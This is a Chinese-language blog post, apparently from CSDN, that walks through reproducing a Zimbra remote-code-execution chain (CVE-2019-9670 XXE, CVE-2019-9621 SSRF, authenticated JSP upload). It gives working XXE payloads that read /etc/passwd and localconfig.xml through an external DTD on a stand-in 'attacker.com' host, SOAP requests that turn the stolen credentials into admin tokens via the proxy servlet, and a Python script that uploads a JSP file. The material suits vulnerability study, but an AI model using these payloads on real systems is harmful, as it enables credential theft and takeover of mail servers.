《A Saga of Code Executions on Zimbra》RCE漏洞分析+复现过程

最新推荐文章于 2023-08-03 10:30:00 发布
最新推荐文章于 2023-08-03 10:30:00 发布
阅读量1.2w 收藏 1
点赞数 2
分类专栏: Java 安全 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fnmsd/article/details/88657083
版权
安全 同时被 3 个专栏收录
22 篇文章 2 订阅
订阅专栏
Java
18 篇文章 3 订阅
订阅专栏
漏洞
4 篇文章 0 订阅
订阅专栏

原文地址:
https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html
https://paper.tuisec.win/detail/8ac5a3d1efbf40b

下载Zimbra的包:

1.从地址https://www.zimbra.com/downloads/zimbra-collaboration-open-source/下载了Zimbra 8.6.0的开源版,并解压

2.解压packages/zimbra-core-***.rpm,得到zimbra核心库的内容,命令如下:

#需要自行安装rpm2cpio
rpm2cpio zimbra-core-8.6.0_GA_1153.RHEL6_64-20141215151155.x86_64.rpm | cpio -div

github上其实也有源码,但是jd-gui方便代码追踪
https://github.com/Grynn/zimbra-mirror

利用XXE读取密码:

CVE-2019-9670,文章中提示使用Autodiscover

查找zimbra-core中带有Autodiscover的类名

find . -name "*.jar"|awk '{print "jar -tvf "$1}' | sh -x | grep -i Autodiscover

更新一下命令(大家可以自己对比一下~):

find . -name "*.jar"|awk '{print "jar -tvf "$1"|awk '\''{print ""\""$1"\"""$0}'\''"}'  | sh | grep -i Autodiscover

PS:Windows下可以直接用Winrar之类的解压缩工具进行搜索。

找到如下两个包:

  • jar -tvf ./j2sdk-20140721/jre/lib/ext/nashorn.jar
    1758 Tue Jul 29 17:08:16 CST 2014 jdk/internal/dynalink/support/AutoDiscovery.class
  • jar -tvf ./lib/jars/zimbrastore.jar
    20149 Mon Dec 15 15:19:12 CST 2014 com/zimbra/cs/service/AutoDiscoverServlet.class

可以看出nashorn.jar是jre的中的jar包,应该不是我们的目标,而AutoDiscoverServlet带有Servlet字样,应是对外提供服务的。

在Zimbra的Wiki中https://wiki.zimbra.com/wiki/Autodiscover,给出了Autodiscover的地址为/Autodiscover/Autodiscover.xml(其实这个功能应该是exchange的)

向/Autodiscover/Autodiscover.xml POST一个空的xml:
在这里插入图片描述

发现提示:No Email address is specified in the Request,在AutoDiscoverServlet.class的doPost中找到如下代码,确认为Autodiscover功能对应类。
在这里插入图片描述

使用Jd-gui反编译代码,发现如下代码逻辑:

public void doPost(HttpServletRequest req, HttpServletResponse resp){
    ...
  reqBytes = ByteUtil.getContent(req.getInputStream(), req.getContentLength());
  ...
  String content = new String(reqBytes, "UTF-8");
  ...
  Document doc = docBuilder.parse(new InputSource(new StringReader(content)));
  ...
  //获取Request标签内容
   NodeList nList = doc.getElementsByTagName("Request");
   ...
    for (int i = 0; i < nList.getLength(); i++)
      {
        Node node = nList.item(i);
        if (node.getNodeType() == 1)
        {
          Element element = (Element)node;
          //读取EMailAddress、AcceptableResponseSchema的内容
          email = getTagValue("EMailAddress", element);
          responseSchema = getTagValue("AcceptableResponseSchema", element);
          //读到邮件跳出
          if (email != null) {
            break;
          }
        }
      }
      ...
      //邮件为null或者长度为0则报邮件错误
       if ((email == null) || (email.length() == 0))
    {
      log.warn("No Email address is specified in the Request, %s", new Object[] { content });
      sendError(resp, 400, "No Email address is specified in the Request");
      return;
    }
    //responseSchema如果不为两个给定类型则报错并返回responseSchema的内容,此处造成了回显式的XXE。
    if ((responseSchema != null) && (responseSchema.length() > 0)) {
      if ((!responseSchema.equals("http://schemas.microsoft.com/exchange/autodiscover/mobilesync/responseschema/2006")) && (!responseSchema.equals("http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a")))
      {
        log.warn("Requested response schema not available " + responseSchema);
        sendError(resp, 503, "Requested response schema not available " + responseSchema);
        return;
      }


}

1.先读取了EMAILAddress和先读取了EMAILAddress和AcceptableResponseSchema
2.验证AcceptableResponseSchema是否正确,如果不正确则返回其内容并报错
3.验证登陆权限

网上查了个Autodiscovery的Request包:
https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxdscli/fc420a31-5180-4a28-8397-8db8977861c6

所以只要将希望XXE的内容放入AcceptableResponseSchema中即可:

<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
 <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
      <EMailAddress>aaaaa</EMailAddress>
      <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
    </Request>
  </Autodiscover>

在这里插入图片描述
由于localconfig.xml为XML文件,需要加上CDATA标签才能作为文本读取,由于XXE不能内部实体进行拼接,所以此处需要使用外部dtd:

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

提交报文内容

<!DOCTYPE Autodiscover [
        <!ENTITY % dtd SYSTEM "http://attacker.com/dtd">
        %dtd;
        %all;
        ]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
        <EMailAddress>aaaaa</EMailAddress>
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
    </Request>
</Autodiscover>

响应如下:
在这里插入图片描述
参考:
https://www.acunetix.com/blog/articles/band-xml-external-entity-oob-xxe/

SSRF

接口参考:
https://files.zimbra.com/docs/soap_api/8.0.4/soap-docs-804/api-reference/index.html
Proxy_Servlet文档:
https://wiki.zimbra.com/wiki/Zimlet_Developers_Guide:Proxy_Servlet_Setup

如上步骤找一下ProxyServlet

  • jar -tvf ./zimbra/lib/jars/zimbrastore.jar
    14208 Mon Dec 15 15:19:22 CST 2014 com/zimbra/cs/zimlet/ProxyServlet.class
    还是在zimbrastore.jar中

ProxyServlet顾名思义,会把请求转发到指定的target,我们可以通过该接口访问到本地监听的7071管理端口。

按照文章中所给分析,将Host修改为:7071为结尾的值,假装自己是从管理端口进入(ServletRequest.getServerPort()取Request中Host端口的问题),同时在Cookie中使用一个低权限的Token,即可进行SSRF。
原文配图:
在这里插入图片描述
低权限token可通过soap接口发送AuthRequest进行获取:

https://target.com/service/soap
先使用上面通过xxe获取的zimbra_admin_name和zimbra_ldap_password进行登陆,获取一个低权限Token

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
       </context>
   </soap:Header>
   <soap:Body>
     <AuthRequest xmlns="urn:zimbraAccount">
        <account by="adminName">zimbra</account>
        <password>xxxx</password>
     </AuthRequest>
   </soap:Body>
</soap:Envelope>

响应中包含一个token:
在这里插入图片描述而后再通过proxy接口,访问admin的soap接口获取高权限Token
https://target.com/service/proxy?target=https://127.0.0.1:7071/service/admin/soap

Cookie中设置Key为ZM_ADMIN_AUTH_TOKEN,值为上面请求所获取的token。

发送同上Body内容,但是AuthRequest的xmlns要改为:urn:zimbraAdmin,否则获取的还是普通权限的Token

注意7071端口是https的,刚开始写成了HTTP,卡了有一个小时。。

文件上传

长亭的预警文章给的提示,可以用文件上传,具体参考 CVE-2013-7091 EXP其中的文件上传部分

import requests
f = {
    'filename1':(None,"justatest.jsp",None),
    'clientFile':("justatest123.jsp",r'<%out.println("justatest");%>',"text/plain"),#以这里的文件名为准
    'requestId':(None,"12",None),
}

headers ={
    "Cookie":"ZM_ADMIN_AUTH_TOKEN=admin_token",#改成自己的admin_token
    "Host":"foo:7071"
}

r = requests.post("https://target.com/service/extension/clientUploader/upload",files=f,headers=headers,verify=False)
print(r.text)

最后效果:
在这里插入图片描述

其他

  1. ProxyServlet不会给代理的地址传所给Cookie,所以如果用Cookie认证类的接口想用Proxy是没法用的。
  2. 前面找接口的方法是有问题的,其实应该看/opt/zimbra/conf/web.xml,开始没照到这个文件。
    github上也有:
    https://github.com/Grynn/zimbra-mirror/blob/074c1ea8a288627b845a99399eec6b2f3ce738d5/ZimbraServer/conf/web.xml

POC

仅供漏洞验证使用,请勿用于违法用途
https://github.com/fnmsd/zimbra_poc

fnmsd
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
Zimbra CVE-2019-9670 XXE + CVE-2019-9621 SSRF 漏洞复现
部分学习记录
03-12 2250
炒冷饭复现:cve-2019-9670 xxe + cve-2019-9621 ssrf
Java采购管理信息系统源码-elastic-stack:使用集中式日志记录将Zimbra与ElasticStack结合使用的指南
06-05
Java采购管理信息系统源码Zimbra 弹性堆栈 本指南介绍了如何通过使用基于 RSyslog 的集中式日志记录将 Elastic Stack 与 Zimbra 结合使用。 将 Elastic Stack 与集中式日志记录结合使用的主要好处: 使搜索和分析历史日志变得容易。 日志事件的可视化以收集见解。 存储日志以供取证研究,以防被黑客入侵。 正常运行时间和证书监控。 Zimbra 和 Elastic Stack 都由许多组件组成。 下图概述了软件组件如何协同工作以从原始日志文件进行可视化。 以最简单的形式,您可以在单个服务器设置中安装 Zimbra,并为所有 Elastic Stack 组件添加另一个服务器。 当然,如果您计划向上扩展,您可以根据需要将多个软件组件拆分到更多虚拟机中。 带有 Elastic Stack 和 RSyslog 的 Zimbra 集群示例。 Zimbra 服务器的基本 Kibana 仪表板如下所示: Zimbra 9 安装上的示例 Elastic Stack Dashboard。 如果没有 Elastic Stack,您的服务器只会保留 Zimbra 服务
关于zimbra复现以及突破
weixin_30721077的博客
04-20 746
Zimbra未登录RCE漏洞利用 首先我是根据这个PDF进行复现的,但是复现过程出现很多问题 首先使用这个XXE读取文件 <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <Autodiscover xmlns="http://sc...
zimbra漏洞利用
kzyyx的博客
08-31 4179
记一次渗透测试zimbra漏洞利用 当时通过界面判断判断出开发利用zimbra搭建的网站。zimbra又存在多个漏洞。 1.首先通过利用了CVE-2019-9670 XXE漏洞来尝试读取/etc/passwd 读取文件成功,证明此漏洞可以被成功利用。 2.接下来读取zimbra的配置文件获取密码,因为配置文件时xml文件,因此需要使用外部dtd获取信息。 请求接口:Post:/Autodiscover/Autodiscover.xml Zimbra配置文件位置为/conf/localconfig.xml 在
黑客正在利用Zimbra ZCS中的未修复RCE漏洞
smellycat000的专栏
10-10 826
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Zimbra 公司的企业协作软件和邮件平台中存在一个严重的远程代码执行漏洞且正遭活跃利用,目前尚不存在补丁。该漏洞的编号是CVE-2022-41352。该漏洞的CVSS评分为9.8,可导致攻击者上传任意文件并在受影响安装程序上执行恶意操作。网络安全公司Rapid7 在分析文章中指出,“该漏洞是因为Zimbra的反病毒引擎 Amavis扫描进站邮件...
Framework for Instruction-level Tracing and Analysis of Program Executions (2006)-计算机科学
04-22
Program execution traces provide the most intimate details of a pro- gram’s dynamic behavior. They can be used for program optimiza- tion, failure diagnosis, collecting software met
checkstyle:Java源代码静态分析-java source code analysis
03-25
Checkstyle 是一个开源的 Java 源代码静态分析工具,其主要目的是帮助开发人员遵循特定的编程规范和编码风格。通过使用 Checkstyle,开发者可以在编码阶段就发现潜在的问题,而不是在后期的代码审查或测试阶段才暴露...
sloc-maven-plugin:用于计算源代码行的Maven插件(SLOC)
02-03
代码Maven插件的源代码行 这个插件计算给定Maven项目中的。 Al Danial是的一种著名的SLOC工具。 总览 该插件是标准的Apache Maven: $ cd sloc-maven-plugin ... total of 1 executions of maven-
com.googlecode 的 maven-db-plugin.jar 包
11-22
1. **创建数据库**:它允许用户在构建过程中自动创建新的数据库,这对于测试环境或者初始化项目非常有用。 2. **运行SQL脚本**:`maven-db-plugin` 支持执行 SQL 脚本来更新数据库结构,如创建表、索引、视图等,...
ora分析脚本
01-06
- pxwplan <sql_id> : get explain plan with work area information of a particular cursor and all connected cursor slave SQL - eplan <sql_id> []: get explain plan with execution statistics - pxeplan ...
Zimbra
zhoumouren88的博客
08-27 1007
第一步:利用XXE读取配置文件 这里利用了CVE-2019-9670漏洞来读取配置文件,你需要在自己的VPS服务器上放置一个dtd文件,并使该文件能够通过HTTP访问。为了演示,我在GitHub上创建了一个仓库,从GitHub上获取dtd文件。 上图中用红框圈起来的就是zimbra账号的密码,先记下来以后会用到。 dtd文件内容如下: 1 <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> 2 <!ENTITY...
TA473 使用 Zimbra 漏洞攻击欧洲与北约的邮件系统
最新发布
wangluoanquan111的博客
08-03 2272
研究人员跟踪发现了部分可能是自定义 CSRF JavaScript 代码的实例,这些代码通过 CVE-2022-27926 来进行攻击。TA473 将其作为URL 超链接嵌入钓鱼邮件的正文中,这些 CSRF JavaScript 代码会由存在漏洞的邮件服务器执行。这些 JavaScript代码复制并依赖于模拟本机 Web 邮件门户的 JavaScript 代码,以返回攻击目标的用户名、密码与 CSRF Token 等关键 Web请求详细信息。
zimbra rce 漏洞复现
weixin_40709439的博客
05-12 6909
本地搭建了好久,虚拟机突然蹦了,。。。 上钟馗之眼和shodan找了个目标 第一步,利用了CVE-2019-9670 XXE漏洞来读取配置文件 Zimbra配置文件位置为/conf/localconfig.xml 根据《A Saga of Code Executions on ZimbraRCE漏洞分析 https://blog.csdn.net/fnmsd/article/details/88...
Zimbra 远程代码执行漏洞(CVE-2019-9670)漏洞分析
sxr__nc的博客
04-19 4308
漏洞的主要利用手法是通过。符号没有进行处理,就会导致上述类型的攻击,攻击者在发送上述类型的数据包的时候可以新建一个。的内容,这样一来处理数据会很方便,但同时也会有巨大的安全隐患:如果把目标。获取,其实只需要将上边的数据包中的字段修改下即可直接获取到高权限的。,在解析的过程中遇到实体的引用会直接获取相应的内容,即这里碰到。函数的处理流程,在整体的处理过程中对于请求的数据包,只针对。两个字段进行的解析,在解析的过程中会判断获取到的邮箱地址和。免费、简单,已经获得了广泛的支持,方便大众的使用。
Zimbra xxe+ssrf导致getshell
一个安全研究员
03-26 6294
分析的第一个java漏洞
[EXP]CVE-2019-9621 Zimbra<8.8.11 GetShell Exploit(配合Cscan可批量)
weixin_30414245的博客
05-06 1007
发现时间 2019年03月18日 威胁目标 采用Zimbra邮件系统的企业 主要风险 远程代码执行 攻击入口 localconfig.xml 配置文件 使用漏洞 CVE-2019-9621 受影响应用 ZimbraCollabora...
开源邮件平台Zimbra 出现新漏洞,用户登录凭据可被盗
smellycat000的专栏
06-15 1793
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士研究人员发现 Zimbra 邮件套件中又出现一个高危漏洞 (CVE-2022-27924),如遭成功利用可导致未认证攻击者窃取用户明文密码且无需任何用户交互。研究员在报告中指出,“通过对受害者邮箱后续的访问权限,攻击者可能提升对目标组织机构的访问权限,并获得对多种内部服务的访问权限,窃取高度敏感信息。”CVE-2022-...
CVE-2022-27925 Zimbra任意文件上传漏洞复现
热爱学习,喜欢折腾!
10-26 4138
Zimbra提供一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。它最大的特色在于其采用Ajax技术模仿CS桌面应用软件的风格开发的客户端兼容Firefox,Safari和IE浏览器。Zimbra Collaboration(又称ZCS)8.8.15和9.0具有mboximport功能,可接收ZIP存档并从中提取文件,具有管理员权限的认证用户可以将任意文件上传到系统中,从而导致目录遍历或远程代码执行。
UnRAR二进制中出现路径遍历缺陷,可导致在Zimbra上执行远程代码
smellycat000的专栏
06-30 544
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士RarLab 的 UnRAR 二进制中存在一个路径遍历漏洞,可导致在商业邮件平台 Zimbra 上执行远程代码并可能影响其它软件。UnRAR 工具用于将RAR文档提取到临时库中,用于扫描病毒和检查垃圾邮件。然而,最近修复的文件写入缺陷 (CVE-2022-30333,CVSS 评分7.5) 意味着未认证攻击者能够“在应用...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值